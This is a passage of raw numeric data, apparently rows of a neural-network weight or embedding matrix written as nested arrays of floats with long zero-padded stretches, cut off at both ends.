-0.871749, -0.13184, 0.476012, -0.0629323, -0.149281, 0.265442, 0.0686733, -0.145368, -0.33982, 0.710938, -0.0698718, 0.09569, -0.705132, -0.0314178, 0.376186, -0.63012, -0.696653, 0.237764, -0.149178, -0.404871, 0.0334336, 0.159359, -0.296805, -0.0407553, -0.182082, 0.049459, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.287861, -0.04678, -0.131263, -0.12598, 0.352121, -1.78031, 0.132815, 0.0757144, -0.0120471, 0.164915, -0.0962221, 0.120225, -0.299619, -0.167812, 0.34793, 0.474671, -0.11004, 0.103, -0.184718, 0.204637, -0.463464, 0.0531635, 1.32197, -0.55262, 0.2249, 0.0571285, 0.564801, -0.311099, -0.0185846, 0.202923, -0.117074, 0.047368, -0.404744, 0.082472, -0.209469, -0.0878709, 0.143208, 0.123766, -0.434521, -0.148712, 0.0145178, -0.094604, 
-0.151499, -0.166134, -0.125543, 0.107524, -0.279476, 0.011276, 0.726611, -0.22419, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.142316, -0.814182, -0.404283, -0.370149, -0.452066, -0.901288, 0.880075, 0.784151, -0.20709, 0.392822, 0.0489599, -0.167056, -3.95979, 0.897697, -0.442115, 0.894111, -0.482519, -0.00375501, 0.346389, -0.0680937, 1.04478, 0.470621, 2.48437, 0.0975758, -1.0105, -0.279931, -2.11522, -0.214022, -0.427502, 0.105757, -0.770574, -0.506058, -0.0277444, 1.21886, -0.29669, 0.108917, 1.75246, -1.19457, 1.0252, -0.409398, -1.01635, -0.386192, -0.221114, -0.478359, 0.00294559, -0.622343, 0.178666, -1.92764, 0.367933, 0.602168, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.103594, -0.0720398, 0.0895735, -0.0543464, 0.091376, -0.100477, 0.58757, 0.242598, -0.271357, 0.131336, -0.0333531, -0.0566682, -0.0900692, 0.100644, -0.117363, -0.0479596, -0.00116666, 0.22435, -0.131118, 0.0707844, 0.111993, -0.0570742, 0.422555, -0.350214, 1.15807, 0.000290742, 0.0681186, 0.0138534, -0.113952, 0.0282196, -0.110515, -0.11541, -0.0222953, 0.282697, -0.130744, 0.00399042, 0.312493, 0.074786, -0.333212, -0.154554, -0.0424785, -0.120969, -0.05402, 0.183557, 0.0407818, -0.0212924, 0.015126, 0.0421608, 0.467899, 0.118486, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.500879, 0.12594, -1.18311, 0.0502378, 0.0665553, -0.1658, 0.91683, -0.139208, -0.0406133, 
0.00956346, 0.00174168, 0.00196598, 0.139596, -0.587051, -0.170849, 0.474565, 0.208667, 0.333218, -0.408373, 0.0925186, -1.50999, -0.194154, 0.135374, -0.379178, 0.402895, 0.216421, 0.0785686, 0.0227739, -0.429809, -0.688562, -1.59372, 0.153006, 0.164011, 0.251045, 0.575912, -3.77942, -2.54885, -0.147509, 0.375189, -0.326011, -4.10714, -0.223976, -0.0468489, -0.192346, -0.470653, 0.115621, 0.498, 0.224584, 0.596895, 0.0949333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.811437, 0.0781903, 0.140518, -0.360265, 0.435942, -0.288602, 0.439813, 0.559768, -0.680948, 0.433477, -0.13786, 0.150993, -0.0731128, 0.341544, -0.0102996, 0.525753, -0.0703896, 0.44283, -0.271071, 0.242988, 0.48054, 0.0188956, 0.976336, -0.481304, 0.721347, 0.237572, 0.079239, -0.00983028, 0.634466, -0.360142, -0.0148708, -0.0259735, -0.840557, -0.0793181, 0.349883, -0.279715, 0.607073, 0.0322783, -0.439898, -0.291687, 0.133832, 0.202222, -0.213299, 0.0957336, 0.258435, -0.0601844, -0.0882932, 0.103154, -0.35955, -0.154226, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0226423, -0.0403901, -0.37341, -0.0161318, -0.119926, 0.0166715, -0.0334573, -0.0714379, -0.0709907, 0.066594, -0.0999774, -0.026993, 0.0372968, 0.0910531, 0.0363538, 0.0226704, 0.0222955, -0.455384, -0.08335, 0.0344807, -0.107881, 0.0709869, 0.434145, -0.0505261, 0.140649, 0.0476212, -0.117637, 0.0264511, -0.00532024, 0.0359947, 0.00956628, -0.145871, -0.100824, -0.40898, -0.0556731, -0.0570016, 0.0504602, -0.201963, -0.00698904, -0.0341373, 0.0380687, -0.00819762, -0.143825, -0.0494305, -0.0500266, -0.0331957, 
-0.0191597, -0.0459413, 0.0103464, -0.0302646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00688077, 0.0804454, -0.33695, -0.0331931, 0.149177, 0.0947901, 0.440679, 0.499239, 0.00456278, 0.165679, -0.041222, 0.0117932, 0.0393663, -0.380001, -0.184088, 0.0212821, 0.0110821, 0.0069298, -0.419095, 0.250814, 0.136258, 0.0627071, -1.212, -0.200348, -1.366, -0.0700765, 0.0417565, -0.0704483, 0.0436412, -0.47107, -0.0172251, 0.0364049, 0.0311798, -0.0253562, -0.0838757, 0.126007, 0.821687, 0.0160065, 0.0717867, 0.0102948, -0.0256147, 0.0230969, -0.587062, 0.0047344, -1.48287, -0.035231, -0.0316535, -0.236771, 0.463297, -0.129401, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0323419, -0.00254679, 0.0283329, -0.00855935, -0.0587841, 0.0318594, -0.189143, -0.0565033, -0.0535691, -0.132939, -0.00899322, -0.0186099, 0.0381308, -0.0215097, 0.0082873, -0.369815, 0.00662978, -0.00076462, 0.0209193, 0.224671, -0.0632537, -0.0770323, -0.0370791, -0.0126841, -0.866457, -0.034074, -0.0487444, -0.0308159, -0.0737665, -0.0174025, -0.00541497, -0.060926, -0.0225717, 0.00816967, -0.107796, 0.00372207, -0.0889563, 0.0705589, 0.0584881, -0.060894, 0.0120495, -0.000304194, -0.165264, 0.0074629, 0.022807, 0.00480721, -0.0200801, 0.0193073, -0.263136, -0.138452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.111732, -0.0781251, -0.214599, -0.0209763, 0.362982, 0.143494, 
-0.0326712, 0.0133072, 0.0909087, -0.2518, -0.0899895, -0.0310441, -0.0898561, 0.0972571, -0.145931, -0.104287, -0.0031406, -0.0766311, -0.0425387, 0.0963478, 0.0957888, 0.00505831, 0.0108931, 0.0871814, 1.21998, -0.10286, 0.0382685, -0.037453, -0.0434237, -0.0064542, -0.00800121, 0.0258678, 0.134227, 0.171988, 0.0120545, 0.0613828, -0.151482, -0.000563613, -0.13341, -0.148155, -0.133182, 0.00524983, -0.0645679, -0.0357779, -0.043702, -0.0269263, 0.00528176, 0.0780104, 0.18348, -0.0884357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.560494, -0.117902, 0.17185, -0.0417377, -0.826381, -0.310646, -0.183176, 0.328201, -0.695226, 0.189864, -0.0112712, -0.153695, -1.05673, 0.335735, 0.446317, -0.647578, -0.0299569, 0.749332, -0.146918, 0.307679, 0.223544, -0.0857113, -0.387297, -0.355934, -0.483143, -0.143031, 0.511502, 0.185676, 0.328072, -0.406083, -0.0940334, 0.0132465, -0.404758, -0.164591, -0.0321921, -0.0525297, 0.28854, 0.207286, -0.345591, 0.0863312, -0.106712, 0.394282, -0.325867, -0.247916, 0.0395227, -0.203009, -0.387025, -0.1184, -0.450579, 0.0927852, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0440856, -0.042445, -0.00868048, -0.0397613, 0.117645, 0.0464773, -0.193045, 0.0963659, 0.00377966, -0.12202, 0.00777864, -0.0353338, 0.112155, -0.0689182, 0.0859579, -0.144996, -0.0085225, 0.109677, 0.00578479, -0.0317219, -0.113144, 0.0667557, 0.273963, -8.47092, 3.49789, 0.0406811, 0.330094, -0.0625371, 0.0105375, -0.102529, -0.0205035, -0.157469, -0.0445341, 0.497417, -0.170305, -0.0472577, -0.0151772, -0.0994383, 0.0411071, -0.0549893, 0.0135095, 
-0.194767, 0.0765783, 0.00794592, 0.0237727, 0.00579351, 0.0035029, -0.258331, -0.351223, 0.141937, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00306404, -0.00597055, 0.00479094, -0.0227752, 0.0128366, 0.00805428, 0.0452696, -0.022526, -0.00208623, -0.0880903, 0.00204299, -0.0141808, -0.045913, 0.0255467, 0.00680807, 0.039204, 0.00332514, 0.0112871, -0.00610723, 0.147932, -0.108795, -0.0120731, 0.111981, 0.0382372, -0.572532, 0.00604884, 0.0103635, 0.000270331, -0.0377498, 0.279641, -0.0152733, -0.0839553, -0.0177529, 0.0255773, -0.0602036, -0.00746006, 0.0336583, -0.019963, 0.125001, -0.0654248, 0.00554361, -0.0202701, -0.00931843, 0.0287518, 0.0216567, -0.0171254, -0.00329204, -0.00997999, 0.0968163, 0.0200358, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.112293, 0.0163886, -0.0390981, 0.01642, 0.0264599, -1.62405, 0.0785744, -0.0401092, -0.0348185, -4.97828, 0.00546404, -0.0535893, 0.233624, -0.0114232, 0.0806789, 0.103856, 0.0180131, 0.0448099, -0.0781089, 0.0111943, -0.156512, -0.0182424, 0.244217, -0.226194, -0.143322, -0.0541756, -0.304976, -0.0166888, 0.019634, -0.328977, -0.0772441, 0.0744289, 0.0491654, 0.139232, 0.0508703, 0.0178523, 0.125444, 0.088567, -0.0732395, 0.0368907, -0.10324, 0.036446, -0.031756, -0.301978, -0.10069, -0.0620842, -0.0544417, -0.0373222, -0.275444, 0.0309976, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.446644, 
0.379774, -1.01724, -0.0959338, -0.531742, 1.81963, 1.72627, -0.322446, -3.00188, -1.58764, -1.07026, 0.244105, -0.556621, -0.947218, 0.123711, 2.34873, -0.681039, 2.28748, 0.421013, -0.30058, 0.098931, -0.693342, 2.82743, -7.1045, -1.95233, 0.135614, -1.6552, -0.0512376, -0.13352, 1.07229, 0.538696, 1.47056, -0.43512, 0.747478, 0.740698, -0.780711, 0.562946, 0.239888, 1.49638, -0.514927, -1.26772, -1.34674, 0.705867, 0.180272, 0.0744998, 0.292226, -0.0948614, -2.40286, 1.9006, 0.240532, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00875356, -0.0128067, 0.0106013, -0.0131399, 0.0610931, -0.0370205, -0.391988, -0.133579, 0.00800814, -0.0552162, -0.00638398, -0.0143548, 0.102382, 0.00580936, -0.028979, 0.148967, 1.39886e-06, -0.0262818, 0.0163246, 0.148051, -0.0226706, -0.00522144, 0.0260445, -0.235949, 0.160104, 0.0211034, 0.526746, -0.104432, -0.0314343, -0.0603073, -0.00809905, 0.0518068, -0.0020968, -0.139523, -0.0467036, -0.0589226, 0.0812326, -0.0770843, -0.102515, -0.0517753, 0.0166431, 0.0408693, -0.0279587, -0.0870778, -0.00443328, -0.0285805, -0.00727501, 0.0423453, 0.158979, 0.0257194, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0362062, -0.00577689, -0.0103657, -0.024757, -0.221979, -0.298263, -0.0037196, 0.100136, -0.0568482, -0.0673329, -0.00247701, 0.0356846, 0.0934723, 0.025239, -0.0761367, 0.394647, 0.00696096, -0.0343712, 0.0284359, 0.198099, 0.0574449, -0.0249449, 0.232673, -0.062573, -0.491593, -0.0832537, 0.127585, 0.0386582, -0.0529601, -0.0360893, -0.0384961, -0.0432024, 0.050301, 0.0381752, -0.0954501, -0.00846791, 0.240627, 
0.0533661, 0.0170262, -0.167452, 0.0129177, -0.088094, 0.0177517, 0.149116, 0.0673526, -0.0561872, -0.0391784, 0.0232981, -0.227678, -0.119072, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.334949, -0.113963, -0.27902, -0.387269, 0.404607, -1.18775, 0.0608408, -0.0178111, -0.0621192, 0.600203, 0.106009, 0.0160685, 0.0407689, 0.304786, -0.0433189, -0.292212, -0.254727, 0.160342, -0.211804, 0.454633, 0.105635, 0.141549, -0.328941, -0.473526, 0.0312564, 0.0549253, 0.0567239, -0.140981, -0.062938, 0.314318, -0.0986961, 0.0319032, -0.100114, 0.148075, 0.215585, 0.183788, -1.52681, 0.0806708, -0.160689, -0.399102, -1.89438, 0.290913, -0.165173, -0.197031, -0.497877, -0.424634, -0.0345733, 0.109606, 0.636899, -0.132753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0985139, -0.0703067, -0.23311, -0.0523105, 0.670557, 0.114279, -0.513058, 0.126474, 0.0837282, 0.160597, -0.0384077, -0.0477434, 0.242995, 0.0954019, -0.516875, 0.346, 0.0963251, -0.301582, -0.702519, 0.138647, -0.156144, 0.0672541, 0.855116, -0.160343, 0.600517, -0.330355, -0.233081, -0.254728, -0.168828, 0.878081, 0.0320869, -0.021294, 0.388049, -0.0368169, -0.135228, 0.181527, -1.05246, -0.209474, -0.3675, -0.345513, -0.155005, -0.187558, 0.0272106, 0.13824, 0.191114, -0.0125833, -0.00179572, 0.234469, 0.257846, -0.0554235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.09411, -0.0731537, 
-0.0711165, -0.00477624, -0.0769465, -0.127319, 0.221147, 0.142496, -0.0293818, -0.332621, -0.0248784, -0.0715314, -0.137483, -0.00141073, -0.111904, -0.174279, 0.0214567, -0.0840158, 0.0410639, 0.0877665, -0.0226189, -0.0964764, -0.025659, 0.12979, -0.17074, -0.103344, 0.065069, -0.0481136, -0.0126777, 0.152007, -0.067303, 0.161168, -0.0537225, 0.0325743, 0.0169831, -0.0445326, 0.108027, 0.0273002, -0.139223, -0.0806787, 0.0870772, 0.0507769, -0.00985393, -0.0717624, 0.0820608, 0.0236482, -0.03004, 0.147908, 0.115562, -0.233878, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0197342, -1.96928, -2.35527, -2.00168, 0.0154415, -0.0599972, -0.201645, -0.289215, 0.0342994, 0.00995885, -0.014354, 0.0170084, -2.28702, -2.74398, 0.0933968, -0.0452534, -0.00721437, 0.0763634, 0.0449166, -0.120002, -0.0205543, 0.184011, -0.0860477, 0.0728849, 0.0044849, 0.0296311, -0.255632, -0.00462001, -0.0344229, 0.26101, -0.00659369, 0.43885, 0.0898151, -1.5187, -0.221728, -0.168991, 0.678921, -0.00453472, -0.136658, 0.0482174, -0.0128041, -0.00967239, -0.00223001, 0.12543, -0.30073, -0.0456717, 0.0130896, -0.292643, -3.57599, 0.0658677, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.19637, -0.0588428, 0.0535369, -0.0799655, 0.227789, -0.251395, -0.522333, 0.387117, 0.179289, -0.236353, 0.00252838, 0.0119426, 0.0127738, 0.0718681, -0.00617394, 0.335547, -0.0536061, -0.00162807, -0.086083, -0.0812915, -0.0464828, -0.107206, -2.37276, -0.0584536, 0.898445, -0.139671, 0.175206, -0.0130803, 0.0266208, -0.00200233, -0.0279031, -0.142046, -0.0784671, 0.345688, -0.18122, -0.0998379, 
0.459488, 0.357805, -0.329936, -0.115887, 0.118929, 0.0104661, -0.231251, 0.357821, 0.0520054, -0.160559, -0.127702, -0.131561, -0.57204, 0.160192, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0408095, -0.0164948, -0.0921487, -0.0381883, 0.188946, 0.0135917, -0.0238149, 0.0362086, -0.0464403, -0.254056, -0.0401621, 0.000949567, -0.115589, 0.10198, -0.0183313, -0.0593024, 0.00797729, 0.122431, 0.0273401, 0.194001, -0.12759, 0.0118569, -0.0541413, 0.088977, 0.815344, -0.0539617, -0.0469992, -0.115166, -0.041914, 0.0993239, -0.0375645, 0.0335681, -0.0442206, 0.00571638, -0.0987009, -0.00685568, -0.0193914, 0.0665324, -0.0155878, -0.0883539, 0.0233174, 0.0159587, -0.060935, -0.0164295, 0.0836622, -0.0138455, -0.0110137, 0.092802, 0.268128, -0.207024, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.107366, 0.000604712, -0.0998088, 0.0727791, -0.0475615, 0.0383725, -0.0688761, -0.0540376, -0.0685794, -0.135154, -0.0375732, 0.00741912, 0.0336323, -0.050909, -0.0286334, -1.12597, -0.0436479, 0.0219768, 0.148643, 0.296541, 0.259102, 0.0210393, -0.455901, 0.0317611, -0.411202, 0.0651753, 0.00491176, 0.0399848, -0.0974066, -0.0601347, 0.0263574, 0.0690879, 0.0526853, 0.221083, 0.0721333, -0.00310101, -0.477794, -0.0969671, -0.325002, -0.0280727, -0.0712338, -0.0430813, -0.0603186, 0.0507441, 0.0187806, 0.0190483, -0.146146, -0.0357812, 0.220854, -0.0862724, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0258, -0.2314, 0.003572, -0.1602, 0.4558, 0.00866, -0.1444, 0.2817, -0.175, 0.1099, -0.03793, -0.1318, -0.296, 0.1952, 0.1398, -0.00729, -0.1414, 0.3943, -0.1581, 0.0502, 0.0328, 0.1054, 0.7964, -0.2617, 1.558, 0.1525, 0.0258, -0.1304, -0.0794, -0.136, -0.07874, -0.1598, 0.1606, 0.7007, -0.5, -0.1288, 0.010284, -0.1263, -0.1797, -0.1915, 0.097, -0.07623, 0.2556, -0.2832, 0.1715, 0.284, -0.1881, 0.3103, -0.819, 0.3213], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02924, -0.06464, -0.01947, -0.02733, -0.1237, 0.0272, -0.3113, 0.3875, -0.02663, 0.1265, -0.0367, 0.0089, -0.0921, 0.2937, -0.03845, -0.6924, 0.0425, 0.06714, -0.0215, 0.2588, -0.3123, -0.0484, 0.1923, -0.0966, -1.115, -0.0901, -0.1367, 0.0298, 0.1086, 0.0214, 0.01816, -0.05615, -0.0127, -0.283, -0.09106, -0.2445, 0.3374, -0.2866, 0.01825, -0.04993, 0.05582, 0.02132, 0.1989, -0.03394, 0.0468, -0.02068, 0.05426, 0.03412, -0.0972, -0.1935], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04193, 0.04697, -0.2593, 